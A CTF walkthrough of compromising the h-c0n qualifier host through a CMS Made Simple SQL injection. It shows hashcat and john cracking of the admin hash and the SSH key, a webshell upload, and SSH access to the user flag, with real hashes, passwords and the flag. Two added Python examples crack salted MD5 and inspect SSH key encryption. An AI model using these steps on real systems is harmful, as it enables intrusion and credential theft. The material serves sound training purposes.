Machine is a box from the h-c0n qualifier CTF, created by iHackLabs, that we must compromise to obtain the user (user.txt) and root (root.txt) flags. It runs Linux (Debian), as the scan below shows. These are the steps we took.
Author: 1v4n a.k.a. @1r0Dm48O
Twitter: https://twitter.com/1r0Dm48O
{0x1} Reconnaissance
We first check that the target is reachable by running ping -c 3 preq02.ihacklabs.com
{0x2} Scanning
We run a full port scan to find the services open and running on the target: nmap -sS -sV preq02.ihacklabs.com -p- --script vuln
root@1v4n:~/CTF/hc0n2020# nmap -sS -sV preq02.ihacklabs.com -p- --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-11 CET
Nmap scan report for preq02.ihacklabs.com (54.36.134.34)
Host is up (0.042s latency).
rDNS record for 54.36.134.34: ip34.ip-54-36-134.eu
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=preq02.ihacklabs.com
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://preq02.ihacklabs.com:80/manual/de/index.html
|     Form id:
|     Form action: http://www.google.com/search
|
|     Path: http://preq02.ihacklabs.com:80/manual/ja/index.html
|     Form id:
|     Form action: http://www.google.com/search
|
|     Path: http://preq02.ihacklabs.com:80/manual/pt-br/index.html
|     Form id:
|     Form action: http://www.google.com/search
|
|     Path: http://preq02.ihacklabs.com:80/manual/zh-cn/index.html
|     Form id:
|     Form action: http://www.google.com/search
|
|     Path: http://preq02.ihacklabs.com:80/manual/ko/index.html
|     Form id:
|     Form action: http://www.google.com/search
|
|     Path: http://preq02.ihacklabs.com:80/manual/en/index.html
|     Form id:
|     Form action: http://www.google.com/search
|
|     Path: http://preq02.ihacklabs.com:80/manual/fr/index.html
|     Form id:
|     Form action: http://www.google.com/search
|
|     Path: http://preq02.ihacklabs.com:80/manual/tr/index.html
|     Form id:
|     Form action: http://www.google.com/search
|
|     Path: http://preq02.ihacklabs.com:80/manual/es/index.html
|     Form id:
|     Form action: http://www.google.com/search
|
|     Path: http://preq02.ihacklabs.com:80/manual/da/index.html
|     Form id:
|_    Form action: http://www.google.com/search
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /admin/login.php: Possible admin folder
|   /doc/: Potentially interesting folder
|   /lib/: Potentially interesting folder
|   /manual/: Potentially interesting folder
|   /modules/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)'
|   /tmp/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)'
|_  /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)'
|_http-server-header: Apache/2.4.25 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
|   cpe:/a:apache:http_server:2.4.25:
|     CVE-2017-7679   7.5   https://vulners.com/cve/CVE-2017-7679
|     CVE-2017-7668   7.5   https://vulners.com/cve/CVE-2017-7668
|     CVE-2017-3169   7.5   https://vulners.com/cve/CVE-2017-3169
|     CVE-2017-3167   7.5   https://vulners.com/cve/CVE-2017-3167
|     CVE-2019-0211   7.2   https://vulners.com/cve/CVE-2019-0211
|     CVE-2018-1312   6.8   https://vulners.com/cve/CVE-2018-1312
|     CVE-2017-15715  6.8   https://vulners.com/cve/CVE-2017-15715
|     CVE-2019-10082  6.4   https://vulners.com/cve/CVE-2019-10082
|     CVE-2017-9788   6.4   https://vulners.com/cve/CVE-2017-9788
|     CVE-2019-0217   6.0   https://vulners.com/cve/CVE-2019-0217
|     CVE-2019-10098  5.8   https://vulners.com/cve/CVE-2019-10098
|     CVE-2019-10081  5.0   https://vulners.com/cve/CVE-2019-10081
|     CVE-2019-0220   5.0   https://vulners.com/cve/CVE-2019-0220
|     CVE-2019-0196   5.0   https://vulners.com/cve/CVE-2019-0196
|     CVE-2018-17199  5.0   https://vulners.com/cve/CVE-2018-17199
|     CVE-2018-1333   5.0   https://vulners.com/cve/CVE-2018-1333
|     CVE-2017-9798   5.0   https://vulners.com/cve/CVE-2017-9798
|     CVE-2017-7659   5.0   https://vulners.com/cve/CVE-2017-7659
|     CVE-2017-15710  5.0   https://vulners.com/cve/CVE-2017-15710
|     CVE-2019-0197   4.9   https://vulners.com/cve/CVE-2019-0197
|     CVE-2019-10092  4.3   https://vulners.com/cve/CVE-2019-10092
|     CVE-2018-11763  4.3   https://vulners.com/cve/CVE-2018-11763
|_    CVE-2018-1283   3.5   https://vulners.com/cve/CVE-2018-1283
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.87 seconds
Two ports are open: 22 (ssh, OpenSSH 7.4p1) and 80 (http, Apache 2.4.25). The vulners list is matched purely on the Apache version banner; Debian backports security fixes without changing that version string, so none of those CVEs is confirmed by the scan. The http-enum findings (/admin/login.php, and /modules/, /tmp/ and /uploads/ with directory listing enabled) are the more useful leads.
{0x3} Enumeration
We focus on the http service (80), enumerating reachable directories with Dirhunt, and find that it hosts CMS Made Simple version 2.2.5 (Wawa). That version is affected by a critical SQL injection, CVE-2019-9053, disclosed on 23/02/2019 and acknowledged by the vendor with an update on 06/03/2019.
root@1v4n:~/CTF/hc0n2020# dirhunt http://preq02.ihacklabs.com/index.php
Welcome to Dirhunt v0.6.0 using Python 3.7.5
[200] http://preq02.ihacklabs.com/ (HTML document)
    Index file found: index.php
[301] http://preq02.ihacklabs.com/manual (Redirect)
    Redirect to: http://preq02.ihacklabs.com/manual/
[403] http://preq02.ihacklabs.com/icons/ (Generic)
[200] http://preq02.ihacklabs.com/manual/ (HTML document)
    Index file found: index.html
...
[200] http://preq02.ihacklabs.com/manual/es/ (HTML document)
    Index file found: index.html
…
[200] http://preq02.ihacklabs.com/manual/es/glossary.html (HTML document)
    Index file found: index.html
…
[200] http://preq02.ihacklabs.com/manual/es/sitemap.html (HTML document)
    Index file found: index.html
…
[200] http://preq02.ihacklabs.com/manual/es/mod/directives.html (HTML document)
    Index file found: index.html
…
[200] http://preq02.ihacklabs.com/manual/es/new_features_2_2.html (HTML document)
    Index file found: index.html
...
[200] http://preq02.ihacklabs.com/manual/es/new_features_2_4.html (HTML document)
    Index file found: index.html
…
[200] http://preq02.ihacklabs.com/manual/es/new_features_2_0.html (HTML document)
    Index file found: index.html
[200] http://preq02.ihacklabs.com/manual/es/license.html (HTML document)
    Index file found: index.html
[200] http://preq02.ihacklabs.com/manual/es/upgrading.html (HTML document)
    Index file found: index.html
[200] http://preq02.ihacklabs.com/manual/es/invoking.html (HTML document)
    Index file found: index.html
…
[200] http://preq02.ihacklabs.com/manual/es/stopping.html (HTML document)
    Index file found: index.html
[200] http://preq02.ihacklabs.com/manual/es/install.html (HTML document)
    Index file found: index.html
[200] http://preq02.ihacklabs.com/manual/es/mpm.html (HTML document)
    Index file found: index.html
[200] http://preq02.ihacklabs.com/manual/es/filter.html (HTML document)
    Index file found: index.html
[200] http://preq02.ihacklabs.com/manual/es/handler.html (HTML document)
    Index file found: index.html
[200] http://preq02.ihacklabs.com/manual/es/getting-started.html (HTML document)
    Index file found: index.html
…
[200] http://preq02.ihacklabs.com/manual/es/expr.html (HTML document)
    Index file found: index.html
[200] http://preq02.ihacklabs.com/manual/es/bind.html (HTML document)
    Index file found: index.html
...
An exploit for the CMS is available as EDB-ID 46635, published on 02/04/2019. We download it and run it against the CMS; through the SQL injection it extracts the admin username, e-mail, password hash and salt, and we then crack the hash with hashcat in mode 20 (md5($salt.$pass)), which is how CMS Made Simple stores its admin passwords.
[+] Salt for password found: da0834c2d528bc22
[+] Username found: admin
[+] Email found: admin@mccd.es
[*] Try: 91f237f9a5e2d049b5d948d8a097871c

hashcat -m 20 91f237f9a5e2d049b5d948d8a097871c:da0834c2d528bc22 /usr/share/wordlists/rockyou.txt -o output.txt --force
hashcat (v5.1.0) starting...
...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 4 secs
...
Session..........: hashcat
Status...........: Cracked
Hash.Type........: md5($salt.$pass)
Hash.Target......: 91f237f9a5e2d049b5d948d8a097871c:da0834c2d528bc22
Time.Started.....: Sun Jan 12 01:49:28 2020 (1 sec)
Time.Estimated...: Sun Jan 12 01:49:29 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 8416 H/s (1.06ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 2048/14344385 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> lovers1
In output.txt we find the admin user's password, lalala. The credentials admin:lalala are valid and give us access to the CMS administration panel.
root@1v4n:~/CTF/hc0n2020/boot2root# ls -la
total 24
drwxr-xr-x 2 root root 4096 ene 12 01:49 .
drwxr-xr-x 6 root root 4096 ene 11 18:21 ..
-rw-r--r-- 1 root root 3370 ene 11 23:50 44976.py
-rw-r--r-- 1 root root 6385 ene 12 00:53 cve-2019-9053.py
-rw------- 1 root root   57 ene 12 01:49 output.txt
root@1v4n:~/CTF/hc0n2020/boot2root# cat output.txt
91f237f9a5e2d049b5d948d8a097871c:da0834c2d528bc22:lalala
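The hashcat mode matters: CMS Made Simple stores admin passwords as md5(salt . password), so the hash only cracks under mode 20 (md5($salt.$pass)); the reversed construction, mode 10 (md5($pass.$salt)), would run through all of rockyou.txt and find nothing. The following is an added example, not part of the original write-up or of the EDB exploit, that reproduces the dictionary attack in plain Python so the mode choice can be checked offline. The salt, target hash and wordlist in it are constructed for the demonstration; the verify() helper can also be pointed at the real triple from output.txt.

```python
# Added example (not from the original write-up): a minimal dictionary attack
# on a CMS Made Simple-style admin hash. CMSMS stores md5(salt . password),
# which is hashcat mode 20 (md5($salt.$pass)); mode 10 is the reverse
# concatenation and never matches. Salt, password and wordlist below are
# constructed for this demonstration.
import hashlib

# Hash constructions, keyed by the hashcat mode number they correspond to.
MODES = {
    20: lambda salt, pw: hashlib.md5((salt + pw).encode()).hexdigest(),  # md5($salt.$pass)
    10: lambda salt, pw: hashlib.md5((pw + salt).encode()).hexdigest(),  # md5($pass.$salt)
}


def verify(hash_hex, salt, password, mode=20):
    """True if the construction for `mode` reproduces hash_hex from salt and password."""
    return MODES[mode](salt, password) == hash_hex.lower()


def crack(hash_hex, salt, wordlist, mode=20):
    """Dictionary attack: return the first candidate that reproduces hash_hex, else None."""
    for candidate in wordlist:
        if verify(hash_hex, salt, candidate, mode):
            return candidate
    return None


# Constructed demo values. In the write-up the salt and hash came from the
# SQLi exploit and the wordlist was rockyou.txt.
DEMO_SALT = "0123456789abcdef"
DEMO_PASSWORD = "lalala"
DEMO_HASH = MODES[20](DEMO_SALT, DEMO_PASSWORD)
DEMO_WORDLIST = ["123456", "password", "qwerty", "lalala", "lovers1"]


def demo():
    """Run the same wordlist under both modes; only the right construction cracks."""
    return {
        "mode20": crack(DEMO_HASH, DEMO_SALT, DEMO_WORDLIST, mode=20),
        "mode10": crack(DEMO_HASH, DEMO_SALT, DEMO_WORDLIST, mode=10),
    }


if __name__ == "__main__":
    print(demo())
    # To check the write-up's own hashcat result, call verify() on the
    # hash:salt:password triple from output.txt:
    # verify("91f237f9a5e2d049b5d948d8a097871c", "da0834c2d528bc22", "lalala")
```

Running it shows mode 20 returning lalala and mode 10 returning None on the same hash and wordlist. The general lesson is to confirm how the application builds its hash (from the source or from the exploit's own verification routine) before spending GPU time on the wrong mode.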
Once inside the administration panel we upload the B4TM4N SH3LL PHP webshell and use it to pull the private key at /home/prequal/backup/id_rsa. The key is passphrase-protected, so we use John the Ripper (ssh2john.py to convert it, then john) to recover the passphrase of the prequal user's SSH key.
root@1v4n:~/CTF/hc0n2020/boot2root# python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
root@1v4n:~/CTF/hc0n2020/boot2root# john id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
...
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
12345678         (id_rsa)
Proceeding with incremental:ASCII
12345678         (id_rsa)
2g 0:00:02:07 3/3 0.01570g/s 1216Kp/s 1216Kc/s 1216KC/s tumms31..tumml20
Session aborted

------------------ Pass 12345678 -----------------
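The two "Cost" lines john prints explain why this key fell in about two minutes at over a million guesses per second: cost 1 = 0 means a legacy PEM key (Proc-Type: 4,ENCRYPTED / DEK-Info) whose passphrase is stretched with OpenSSL's MD5-based EVP_BytesToKey, and cost 2 = 1 means a single iteration. A key in the newer openssh-key-v1 format uses bcrypt with a round count and cracks orders of magnitude slower. The following is an added example, not code from the write-up or from John the Ripper, that classifies a key file by its passphrase protection and implements the legacy MD5 derivation; both key samples in it are constructed headers with placeholder bodies, not the id_rsa taken from the target.

```python
# Added example (not from the original write-up): classify an SSH private key by
# how its passphrase is protected, which is what decides how cheap the john
# attack above is. Legacy PEM keys ("Proc-Type: 4,ENCRYPTED") use OpenSSL's
# MD5 EVP_BytesToKey with one iteration (john's cost 1 = 0, cost 2 = 1);
# openssh-key-v1 keys use bcrypt with a round count. Both samples below are
# constructed headers without real key material.
import base64
import hashlib
import struct


def _ssh_string(b):
    """Encode bytes as an SSH wire string (uint32 big-endian length + data)."""
    return struct.pack(">I", len(b)) + b


def _read_ssh_string(buf, off):
    """Decode an SSH wire string at offset off; return (data, new_offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_key(pem_text):
    """Return a dict describing the key file's format, cipher, KDF and KDF rounds."""
    lines = [l.strip() for l in pem_text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_ssh_string(blob, len(magic))
        kdf, off = _read_ssh_string(blob, off)
        kdfopts, off = _read_ssh_string(blob, off)
        rounds = None
        if kdf == b"bcrypt":          # kdfoptions = string(salt) || uint32(rounds)
            _salt, o = _read_ssh_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh-v1", "encrypted": cipher != b"none",
                "kdf": kdf.decode(), "cipher": cipher.decode(), "rounds": rounds}
    # Legacy PEM: RFC 1421-style headers before the base64 body.
    headers = dict(l.split(": ", 1) for l in lines[1:] if ": " in l)
    if headers.get("Proc-Type") == "4,ENCRYPTED":
        cipher, iv_hex = headers["DEK-Info"].split(",")
        return {"format": "pem", "encrypted": True, "kdf": "md5-evp-bytestokey",
                "cipher": cipher, "iv": iv_hex, "rounds": 1}
    return {"format": "pem", "encrypted": False, "kdf": None, "cipher": None, "rounds": None}


def evp_bytes_to_key_md5(passphrase, iv_hex, key_len):
    """OpenSSL's legacy PEM KDF: D_i = MD5(D_{i-1} || passphrase || iv[:8]), concatenated
    until key_len bytes. One MD5 per candidate per 16 bytes is why it cracks so fast."""
    salt = bytes.fromhex(iv_hex)[:8]
    out, prev = b"", b""
    while len(out) < key_len:
        prev = hashlib.md5(prev + passphrase.encode() + salt).digest()
        out += prev
    return out[:key_len]


# Constructed sample 1: legacy encrypted PEM header; the body is placeholder base64.
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

QUJDREVGR0hJSktMTU5PUA==
-----END RSA PRIVATE KEY-----"""


def _build_openssh_v1(cipher, kdf, rounds):
    """Constructed sample 2: only the header fields of an openssh-key-v1 blob."""
    kdfopts = (_ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)) if kdf == "bcrypt" else b""
    blob = (b"openssh-key-v1\x00" + _ssh_string(cipher.encode())
            + _ssh_string(kdf.encode()) + _ssh_string(kdfopts))
    b64 = base64.b64encode(blob).decode()
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n" + b64 + "\n-----END OPENSSH PRIVATE KEY-----"


NEW_PEM = _build_openssh_v1("aes256-ctr", "bcrypt", 16)

if __name__ == "__main__":
    for name, key in (("legacy", LEGACY_PEM), ("openssh-v1", NEW_PEM)):
        print(name, inspect_key(key))
```

Run against a key you are about to attack, the "pem / md5-evp-bytestokey / rounds 1" result tells you a wordlist run is cheap; a "bcrypt" result with a high round count tells you to narrow the candidate list first. The same inspection is the defender's check: keys still in the legacy format should be re-encrypted with ssh-keygen -p -o so they get the bcrypt KDF.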
{0x4} Access
We log in to the box with ssh -i id_rsa prequal@54.36.134.34 and the passphrase 12345678 recovered above. In /home/prequal/ we find the user flag in the file local.txt.
prequal@h-c0n_prequal:~$ id
uid=1001(prequal) gid=1001(prequal) groups=1001(prequal)
prequal@h-c0n_prequal:~$ pwd
/home/prequal
prequal@h-c0n_prequal:~$ ls -la
total 44
drwxr-xr-x 5 prequal prequal 4096 Jan 10 02:05 .
drwxr-xr-x 3 root    root    4096 Dec 19 04:41 ..
-rw------- 1 prequal prequal  118 Jan 10 02:05 .Xauthority
-rw------- 1 prequal prequal   84 Jan 10 01:42 .bash_history
-rw-r--r-- 1 prequal prequal  220 Dec 19 04:41 .bash_logout
-rw-r--r-- 1 prequal prequal 3526 Dec 19 04:41 .bashrc
drwxr-xr-x 2 prequal prequal 4096 Dec 19 04:45 .nano
-rw-r--r-- 1 prequal prequal  675 Dec 19 04:41 .profile
drwx------ 2 prequal prequal 4096 Jan  9 11:14 .ssh
drwxr-xr-x 2 prequal prequal 4096 Jan  9 11:26 backup
-rw------- 1 prequal prequal   40 Jan  9 04:09 local.txt
prequal@h-c0n_prequal:~$ cat local.txt
H-c0n{3ab7568bdae26ac11f6b9e14cad546f9}
And we have the user flag from local.txt > H-c0n{3ab7568bdae26ac11f6b9e14cad546f9}